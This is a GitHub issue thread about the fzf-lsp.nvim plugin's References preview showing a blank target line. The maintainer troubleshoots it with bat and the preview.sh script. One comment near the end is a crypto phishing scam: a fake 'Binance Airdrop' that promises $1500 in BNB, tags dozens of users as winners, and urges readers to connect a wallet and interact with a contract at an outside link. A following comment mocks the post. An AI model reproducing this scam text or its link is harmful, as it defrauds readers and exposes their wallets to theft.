### ISSUE TITLE
References does not preview line with reference

### ISSUE THREAD

**Issue by swtch1** [gfanto/fzf-lsp.nvim#35]
**What did you do?**

Selected a symbol and called `:References`.

**What did you expect to happen?**

For fzf to display the references with a full preview of the code on the right.

**What actually happened?**

The preview is shown but the target line is always blank.

![image](https://user-images.githubusercontent.com/12050926/232127117-e4e9c4b8-3389-4b6c-88bf-bee5b86fb3c7.png)

**Comment by gfanto** [comment]
Installing [bat](https://github.com/sharkdp/bat) should immediately fix your problem, but anyway by default it should also work with cat, at least in my system does.
If you take the script [bin/preview.sh](https://github.com/gfanto/fzf-lsp.nvim/blob/main/bin/preview.sh) an you call it like:
```sh
preview.sh <filepath>:<row>
```
does the specified row highlight?

**Comment by swtch1** [comment]
You are correct, it works using bat.. and I get better colors.  Thanks.

**Comment by swtch1** [comment]
After installing bat the line highlights correctly.  I ripped out the lines that check for bat since I have it now and I get the same view as I did in fzf before with no text (save the 0 line number) on the target line.

**Comment by gfanto** [comment]
When you say you ripped out the line that check for bat, do you mean you have forced the script to use `cat`?
If so, can i ask you which os are you using?

**Comment by swtch1** [comment]
Yes, I forced it to use `cat` since I already had `bat` installed at that point.

I'm on the latest MacOS.

**Comment by tim-tepia** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @tajerdev, @D1mon, @ruuderie, @pekoqt, @SocialScream, @marwanhilmi, @youlast, @xlansmasry, @Ayasouk, @ralphchristianeclipse, @0X21-Labs, @RigoOnRails, @h-michael, @tibinthomas, @QaidVoid, @Azard, @Fatemeh5414784, @hassancodes, @sagar-pardhi, @rodolfohgc, @araimono, @neosarchizo, @brolag, @Bianca-Vision, @smrutil, @wdshin, @dipaksaraf, @lindamarissa, @gregorynicholas, @TamPhilip, @kebbbnnn, @b0o, @fredliang44, @oskram, @ClarePhang, @Huncho3511, @joc-rgb, @neuron19, @DamienDoumer, @sadensmol, @mwilc0x, @alexcodetech1, @raysubham, @stodeo, @dreamerate, @avenusengineer, @wekhrozomedo, @snehesht, @ri0t123, @tiagoapp

**Comment by RigoOnRails** [comment]
@tim-tepia Lol imagine trying to scam software engineers
